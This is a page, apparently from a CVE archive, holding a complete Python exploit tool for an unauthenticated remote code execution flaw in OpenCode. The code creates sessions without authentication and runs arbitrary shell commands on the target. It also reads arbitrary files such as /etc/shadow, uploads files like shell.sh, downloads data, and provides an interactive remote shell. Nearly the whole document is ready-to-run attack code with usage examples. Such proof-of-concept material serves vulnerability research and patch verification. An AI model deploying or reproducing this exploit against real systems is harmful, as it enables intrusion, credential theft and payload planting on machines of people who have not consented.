4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import requests
import argparse
import sys
import json
import os
import readline
from urllib.parse import urlparse
from datetime import datetime
from typing import Optional, Dict, Any

import urllib3
# The HTTP calls in this file pass verify=False (no TLS certificate
# verification); silence the InsecureRequestWarning urllib3 emits for them.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Colors:
    """ANSI SGR escape sequences used to colour and style terminal output."""

    # Resets every attribute; appended after each styled fragment.
    ENDC = '\033[0m'

    # Text attributes.
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

    # Bright foreground colours (SGR codes 91-96).
    FAIL = '\033[91m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    OKBLUE = '\033[94m'
    HEADER = '\033[95m'
    OKCYAN = '\033[96m'

class OpenCodeExploit:
    
    def __init__(self, target: str, timeout: int = 10, proxy: str = None):
        """Store connection settings and prepare the shared HTTP session.

        Args:
            target: Base URL of the server; trailing slashes are stripped.
            timeout: Per-request timeout in seconds.
            proxy: Optional proxy URL applied to both http and https traffic.
        """
        self.target = target.rstrip('/')
        self.timeout = timeout

        # One requests.Session is reused for every call made by this object.
        http = requests.Session()
        self.session = http

        # Identifiers filled in later by create_session() / create_pty().
        self.session_id = None
        self.pty_id = None

        http.headers.update({
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
            'Content-Type': 'application/json'
        })

        if proxy:
            # Same proxy for both schemes.
            http.proxies = dict.fromkeys(('http', 'https'), proxy)

        # Counters reported by print_statistics().
        self.stats = dict.fromkeys(
            ('commands_executed', 'files_read', 'files_written', 'errors'),
            0,
        )
        
    def log(self, message: str, level: str = "INFO"):
        """Print ``message`` with the colour and bracketed tag for ``level``.

        Levels other than INFO/SUCCESS/ERROR/WARNING/DEBUG are printed with
        no colour and a ``[?]`` tag.
        """
        # level -> (colour escape, tag)
        styles = {
            "INFO": (Colors.OKBLUE, "[*]"),
            "SUCCESS": (Colors.OKGREEN, "[+]"),
            "ERROR": (Colors.FAIL, "[-]"),
            "WARNING": (Colors.WARNING, "[!]"),
            "DEBUG": (Colors.OKCYAN, "[.]"),
        }
        color, prefix = styles.get(level, ("", "[?]"))

        print(f"{color}{prefix} {message}{Colors.ENDC}")
    
    def verify_target(self) -> bool:
        try:
            self.log(f"Verifying target: {self.target}")
            
            # Try to create session
            session_id = self.create_session()
            if session_id:
                self.log("Target is VULNERABLE!", "SUCCESS")
                return True
            else:
                self.log("Target does not appear vulnerable", "ERROR")
                return False
                
        except Exception as e:
            self.log(f"Target verification failed: {str(e)}", "ERROR")
            return False
    
    def create_session(self) -> Optional[str]:
        try:
            url = f"{self.target}/session"
            self.log(f"Creating session...", "INFO")
            
            response = self.session.post(
                url,
                json={},
                timeout=self.timeout,
                verify=False
            )
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if 'id' in data:
                        self.session_id = data['id']
                        self.log(f"Session created: {self.session_id}", "SUCCESS")
                        return self.session_id
                except (json.JSONDecodeError, KeyError):
                    pass
                    
            return None
            
        except requests.exceptions.RequestException as e:
            self.log(f"Session creation failed: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None
    
    #Execute arbitrary shell command
    def execute_command(self, command: str, silent: bool = False) -> Optional[Dict]:
        if not self.session_id:
            if not self.create_session():
                return None
        
        try:
            if not silent:
                self.log(f"Executing: {command}")
                
            url = f"{self.target}/session/{self.session_id}/shell"
            
            payload = {
                "agent": "build",
                "command": command
            }
            
            response = self.session.post(
                url,
                json=payload,
                timeout=self.timeout,
                verify=False
            )
            
            self.stats['commands_executed'] += 1
            
            if response.status_code in [200, 201, 202]:
                if not silent:
                    self.log("Command executed successfully", "SUCCESS")
                    
                try:
                    return response.json()
                except json.JSONDecodeError:
                    return {"output": response.text}
            else:
                if not silent:
                    self.log(f"Command failed: HTTP {response.status_code}", "ERROR")
                self.stats['errors'] += 1
                return None
                
        except requests.exceptions.RequestException as e:
            if not silent:
                self.log(f"Execution error: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None
    
    def create_pty(self) -> Optional[str]:
        try:
            self.log("Creating PTY session...")
            url = f"{self.target}/pty"
            
            response = self.session.post(
                url,
                json={},
                timeout=self.timeout,
                verify=False
            )
            
            if response.status_code in [200, 201]:
                try:
                    data = response.json()
                    if 'id' in data:
                        self.pty_id = data['id']
                        self.log(f"PTY created: {self.pty_id}", "SUCCESS")
                        return self.pty_id
                except:
                    pass
                    
                self.log("PTY created (no ID returned)", "SUCCESS")
                return "default"
                
            self.log(f"PTY creation failed: HTTP {response.status_code}", "ERROR")
            return None
            
        except requests.exceptions.RequestException as e:
            self.log(f"PTY error: {str(e)}", "ERROR")
            return None
    
    #Read arbitrary file from target
    def read_file(self, filepath: str) -> Optional[str]:
        try:
            self.log(f"Reading file: {filepath}")
            url = f"{self.target}/file/content"
            params = {"path": filepath}
            
            response = self.session.get(
                url,
                params=params,
                timeout=self.timeout,
                verify=False
            )
            
            if response.status_code == 200:
                self.stats['files_read'] += 1
                self.log(f"File read successfully ({len(response.text)} bytes)", "SUCCESS")
                return response.text
            else:
                self.log(f"File read failed: HTTP {response.status_code}", "ERROR")
                self.stats['errors'] += 1
                return None
                
        except requests.exceptions.RequestException as e:
            self.log(f"File read error: {str(e)}", "ERROR")
            self.stats['errors'] += 1
            return None
    
    #Write file to target system via command execution
    def write_file(self, filepath: str, content: str) -> bool:
        try:
            self.log(f"Writing file: {filepath}")
            
            import base64
            encoded = base64.b64encode(content.encode()).decode()
            
            command = f"echo {encoded} | base64 -d > {filepath}"
            result = self.execute_command(command, silent=True)
            
            if result:
                verify_cmd = f"test -f {filepath} && echo 'OK'"
                verify = self.execute_command(verify_cmd, silent=True)
                
                if verify and 'OK' in str(verify):
                    self.stats['files_written'] += 1
                    self.log(f"File written successfully", "SUCCESS")
                    return True
                    
            self.log("File write failed", "ERROR")
            return False
            
        except Exception as e:
            self.log(f"File write error: {str(e)}", "ERROR")
            return False
    
    #Upload local file to target
    def upload_file(self, local_path: str, remote_path: str) -> bool:
        """Send a local file's contents to ``remote_path`` via execute_command().

        The file is read as bytes and base64-encoded. Encodings longer than
        50000 characters are appended chunk-by-chunk to ``<remote_path>.b64``
        and decoded in a final command; shorter ones go through a single
        ``echo ... | base64 -d`` command.

        Args:
            local_path: Path of the file to read on this machine.
            remote_path: Destination path, interpolated as-is into each
                command string.

        Returns:
            True when the closing ``ls -lh`` call returns a truthy result;
            False when the local file is missing, a chunk command returns a
            falsy result, the ``ls`` call does, or an exception is raised.
        """
        try:
            if not os.path.exists(local_path):
                self.log(f"Local file not found: {local_path}", "ERROR")
                return False
                
            self.log(f"Uploading: {local_path} -> {remote_path}")
            
            with open(local_path, 'rb') as f:
                content = f.read()
                
            import base64
            encoded = base64.b64encode(content).decode()
            
            if len(encoded) > 50000:
                self.log("Large file, uploading in chunks...")
                chunk_size = 50000
                chunks = [encoded[i:i+chunk_size] for i in range(0, len(encoded), chunk_size)]
                
                # NOTE(review): this removes remote_path itself, while the
                # chunks below are appended to remote_path + ".b64"; the
                # staging file is not cleared first.
                self.execute_command(f"rm -f {remote_path}", silent=True)
                
                for i, chunk in enumerate(chunks):
                    cmd = f"echo {chunk} >> {remote_path}.b64"
                    if not self.execute_command(cmd, silent=True):
                        self.log(f"Upload failed at chunk {i+1}", "ERROR")
                        return False
                        
                # The return value of the decode step is not inspected.
                decode_cmd = f"base64 -d {remote_path}.b64 > {remote_path} && rm {remote_path}.b64"
                self.execute_command(decode_cmd, silent=True)
            else:
                command = f"echo {encoded} | base64 -d > {remote_path}"
                self.execute_command(command, silent=True)
            
            # NOTE(review): success is decided solely by whether this call
            # returned something truthy; the listing output is not examined.
            verify_cmd = f"ls -lh {remote_path}"
            result = self.execute_command(verify_cmd, silent=True)
            
            if result:
                self.log("Upload successful!", "SUCCESS")
                return True
            else:
                self.log("Upload verification failed", "ERROR")
                return False
                
        except Exception as e:
            self.log(f"Upload error: {str(e)}", "ERROR")
            return False
    
    #Download file from target
    def download_file(self, remote_path: str, local_path: str) -> bool:
        try:
            self.log(f"Downloading: {remote_path} -> {local_path}")
            
            content = self.read_file(remote_path)
            if content:
                with open(local_path, 'w') as f:
                    f.write(content)
                    
                self.log(f"Downloaded successfully ({len(content)} bytes)", "SUCCESS")
                return True
            else:
                self.log("Download failed", "ERROR")
                return False
                
        except Exception as e:
            self.log(f"Download error: {str(e)}", "ERROR")
            return False
    
    def get_system_info(self) -> Dict[str, str]:
        self.log("Gathering system information...")
        
        info = {}
        
        commands = {
            'hostname': 'hostname',
            'username': 'whoami',
            'user_id': 'id',
            'current_dir': 'pwd',
            'kernel': 'uname -a',
            'os_release': 'cat /etc/os-release 2>/dev/null | head -5',
            'ip_address': 'ip addr show 2>/dev/null | grep inet | head -5',
            'processes': 'ps aux | head -10'
        }
        
        for key, cmd in commands.items():
            result = self.execute_command(cmd, silent=True)
            if result:
                info[key] = str(result).strip()
                
        return info
        
    #Interactive shell mode
    def interactive_shell(self):
        """Run a read-dispatch loop over lines typed by the operator.

        A session is created first when none exists; the method returns
        immediately if that fails. Each input line is matched against the
        built-in keywords (exit, help, read, download, upload, sysinfo, stats,
        session); anything else is passed to execute_command(). The loop ends
        on ``exit`` or end-of-input; Ctrl-C only prints a reminder.
        """
        if not self.session_id:
            if not self.create_session():
                return
        
        print(f"\n{Colors.OKGREEN}{Colors.BOLD}[*] Entering interactive shell mode{Colors.ENDC}")
        print(f"{Colors.WARNING}[!] Type 'help' for commands, 'exit' to quit{Colors.ENDC}\n")
        
        # Prompt labels are built from str() of the whole execute_command()
        # result, with fixed fallbacks when the call returns nothing.
        # NOTE(review): that result is a dict on success, so the prompt shows
        # the dict's repr rather than a bare name; confirm this is intended.
        hostname_result = self.execute_command("hostname", silent=True)
        hostname = str(hostname_result).strip() if hostname_result else "target"
        
        username_result = self.execute_command("whoami", silent=True)
        username = str(username_result).strip() if username_result else "user"
        
        while True:
            try:
                prompt = f"{Colors.OKGREEN}{username}@{hostname}{Colors.ENDC}$ "
                cmd = input(prompt).strip()
                
                # Blank line: prompt again.
                if not cmd:
                    continue
                
                # 'exit' and 'help' are matched case-insensitively; the
                # remaining keywords below are case-sensitive.
                if cmd.lower() == 'exit':
                    print(f"{Colors.WARNING}[*] Exiting...{Colors.ENDC}")
                    break
                    
                elif cmd.lower() == 'help':
                    self.print_shell_help()
                    continue
                    
                elif cmd.startswith('read '):
                    # Everything after the keyword is taken as the path.
                    filepath = cmd[5:].strip()
                    content = self.read_file(filepath)
                    if content:
                        print(content)
                    continue
                    
                elif cmd.startswith('download '):
                    # Whitespace-split: arguments beyond the first two are
                    # ignored, and paths containing spaces are not supported.
                    parts = cmd.split()
                    if len(parts) >= 3:
                        self.download_file(parts[1], parts[2])
                    else:
                        print(f"{Colors.FAIL}[-] Usage: download <remote_path> <local_path>{Colors.ENDC}")
                    continue
                    
                elif cmd.startswith('upload '):
                    parts = cmd.split()
                    if len(parts) >= 3:
                        self.upload_file(parts[1], parts[2])
                    else:
                        print(f"{Colors.FAIL}[-] Usage: upload <local_path> <remote_path>{Colors.ENDC}")
                    continue
                    
                elif cmd == 'sysinfo':
                    info = self.get_system_info()
                    print(json.dumps(info, indent=2))
                    continue
                    
                elif cmd == 'stats':
                    self.print_statistics()
                    continue
                    
                elif cmd == 'session':
                    print(f"Session ID: {self.session_id}")
                    continue
                
                # Not a built-in keyword: forward the line unchanged.
                result = self.execute_command(cmd, silent=True)
                if result:
                    # Prefer the 'output' field; otherwise show the whole
                    # result, except when it stringifies to '{}'.
                    output = result.get('output') or str(result)
                    if output and output != '{}':
                        print(output)
                        
            except KeyboardInterrupt:
                # Ctrl-C does not leave the loop.
                print(f"\n{Colors.WARNING}[!] Interrupted. Type 'exit' to quit.{Colors.ENDC}")
            except EOFError:
                # End of input (e.g. Ctrl-D) ends the loop.
                break
            except Exception as e:
                # Any other error is reported and the loop continues.
                print(f"{Colors.FAIL}[-] Error: {str(e)}{Colors.ENDC}")
    
    def print_shell_help(self):
        help_text = f"""
{Colors.BOLD}Interactive Shell Commands:{Colors.ENDC}

{Colors.OKCYAN}Special Commands:{Colors.ENDC}
  help                          Show this help
  exit                          Exit interactive shell
  read <file>                   Read file content
  download <remote> <local>     Download file
  upload <local> <remote>       Upload file
  sysinfo                       Gather system information
  stats                         Show exploitation statistics
  session                       Show current session ID

{Colors.OKCYAN}Any other command:{Colors.ENDC}
  Will be executed as a shell command on the target

{Colors.WARNING}Examples:{Colors.ENDC}
  ls -la
  cat /etc/passwd
  read /etc/shadow
  download /etc/hosts ./hosts.txt
  upload shell.sh /tmp/shell.sh
"""
        print(help_text)
    
    def print_statistics(self):
        """Print the four counters held in ``self.stats``."""
        counters = self.stats
        report = [
            f"\n{Colors.BOLD}Exploitation Statistics:{Colors.ENDC}",
            f"  Commands Executed:  {counters['commands_executed']}",
            f"  Files Read:         {counters['files_read']}",
            f"  Files Written:      {counters['files_written']}",
            # Trailing newline leaves a blank line after the report.
            f"  Errors:             {counters['errors']}\n",
        ]
        print("\n".join(report))

def print_banner():
    """Print the boxed tool banner in bold red."""
    print(f"""
{Colors.FAIL}{Colors.BOLD}
╔════════════════════════════════════════════════════════════════╗
║                                                                ║
║         CVE-2026-22812 Exploit Tool v1.0.0                     ║
║         OpenCode Unauthenticated RCE Exploitation              ║
║                                                                ║
║  Target: OpenCode < 1.0.216                                    ║
║  CVSS Score: 8.8 (High)                                        ║
║  Type: Unauthenticated Remote Code Execution                   ║
║                                                                ║
║  Author: @rohmatariow                                          ║
║  GitHub: github.com/rohmatariow/CVE-2026-22812-exploit         ║
║                                                                ║
╚════════════════════════════════════════════════════════════════╝
{Colors.ENDC}
""")

def main():
    """Command-line entry point: parse arguments and run one action.

    With ``--verify`` or no action flag at all, only verify_target() is run
    and the process exits 0 (session created) or 1. Otherwise a session is
    created and exactly one action is dispatched from the if/elif chain
    below. Exit status is 130 on Ctrl-C and 1 on any other exception.
    """
    print_banner()
    
    parser = argparse.ArgumentParser(
        description='CVE-2026-22812 Exploitation Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=f"""
{Colors.BOLD}Examples:{Colors.ENDC}
  # Interactive shell
  python3 exploit.py -t http://192.168.1.10:4096 -i
  
  # Execute single command
  python3 exploit.py -t http://192.168.1.10:4096 -c "id"
  
  # Read file
  python3 exploit.py -t http://192.168.1.10:4096 -r /etc/passwd
  
  # Upload file
  python3 exploit.py -t http://192.168.1.10:4096 --upload shell.sh /tmp/shell.sh
  
  # Download file
  python3 exploit.py -t http://192.168.1.10:4096 --download /etc/shadow ./shadow.txt
  
  # Gather system info
  python3 exploit.py -t http://192.168.1.10:4096 --sysinfo
  
  # Use with proxy (Burp)
  python3 exploit.py -t http://target:4096 -c "id" --proxy http://127.0.0.1:8080
        """
    )
    
    parser.add_argument('-t', '--target', required=True,
                       help='Target URL (e.g., http://192.168.1.10:4096)')
    
    # At most one of these five flags may be given per invocation.
    action_group = parser.add_mutually_exclusive_group()
    action_group.add_argument('-c', '--command', help='Execute single command')
    action_group.add_argument('-r', '--read', help='Read file')
    action_group.add_argument('-i', '--interactive', action='store_true',
                            help='Interactive shell mode')
    action_group.add_argument('--sysinfo', action='store_true',
                            help='Gather system information')
    action_group.add_argument('--pty', action='store_true',
                            help='Create PTY session')
    
    # NOTE(review): --upload and --download are registered outside the
    # exclusive group, so they can be combined with the flags above; the
    # if/elif dispatch below then runs only the first matching action.
    parser.add_argument('--upload', nargs=2, metavar=('LOCAL', 'REMOTE'),
                       help='Upload file: --upload local.txt /tmp/remote.txt')
    parser.add_argument('--download', nargs=2, metavar=('REMOTE', 'LOCAL'),
                       help='Download file: --download /etc/passwd ./passwd.txt')
    
    parser.add_argument('--timeout', type=int, default=10,
                       help='Request timeout in seconds (default: 10)')
    parser.add_argument('--proxy', help='Proxy URL (e.g., http://127.0.0.1:8080)')
    parser.add_argument('--verify', action='store_true',
                       help='Only verify if target is vulnerable')
    
    args = parser.parse_args()
    
    try:
        exploit = OpenCodeExploit(
            target=args.target,
            timeout=args.timeout,
            proxy=args.proxy
        )
        
        # Verify-only mode: explicit --verify, or no action flag supplied.
        if args.verify or not any([args.command, args.read, args.interactive, 
                                    args.sysinfo, args.pty, args.upload, args.download]):
            if exploit.verify_target():
                print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] Target is VULNERABLE to CVE-2026-22812!{Colors.ENDC}")
                print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
                sys.exit(0)
            else:
                print(f"\n{Colors.FAIL}[-] Target does not appear vulnerable{Colors.ENDC}\n")
                sys.exit(1)
        
        # Every action below needs a session.
        if not exploit.create_session():
            print(f"\n{Colors.FAIL}[-] Failed to create session. Target may not be vulnerable.{Colors.ENDC}\n")
            sys.exit(1)
        
        print(f"\n{Colors.OKGREEN}[+] Target is VULNERABLE!{Colors.ENDC}")
        print(f"{Colors.OKGREEN}[+] Session ID: {exploit.session_id}{Colors.ENDC}\n")
        
        # Dispatch: the first matching flag wins.
        if args.interactive:
            exploit.interactive_shell()
            
        elif args.command:
            result = exploit.execute_command(args.command)
            if result:
                # Prefer the 'output' field; otherwise dump the whole result.
                output = result.get('output') or json.dumps(result, indent=2)
                print(f"\n{output}\n")
                
        elif args.read:
            content = exploit.read_file(args.read)
            if content:
                print(f"\n{content}\n")
                
        elif args.sysinfo:
            info = exploit.get_system_info()
            print(f"\n{Colors.BOLD}System Information:{Colors.ENDC}")
            print(json.dumps(info, indent=2))
            print()
            
        elif args.pty:
            pty_id = exploit.create_pty()
            if pty_id:
                print(f"\n{Colors.OKGREEN}[+] PTY Session ID: {pty_id}{Colors.ENDC}\n")
                
        elif args.upload:
            exploit.upload_file(args.upload[0], args.upload[1])
            
        elif args.download:
            exploit.download_file(args.download[0], args.download[1])
        
        # Summary is shown only when at least one command or file read ran.
        if exploit.stats['commands_executed'] > 0 or exploit.stats['files_read'] > 0:
            exploit.print_statistics()
            
    except KeyboardInterrupt:
        print(f"\n{Colors.WARNING}[!] Interrupted by user{Colors.ENDC}\n")
        sys.exit(130)
    except Exception as e:
        # sys.exit() above raises SystemExit, which is not an Exception
        # subclass, so those exits pass through this handler untouched.
        print(f"\n{Colors.FAIL}[-] Fatal error: {str(e)}{Colors.ENDC}\n")
        sys.exit(1)

# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()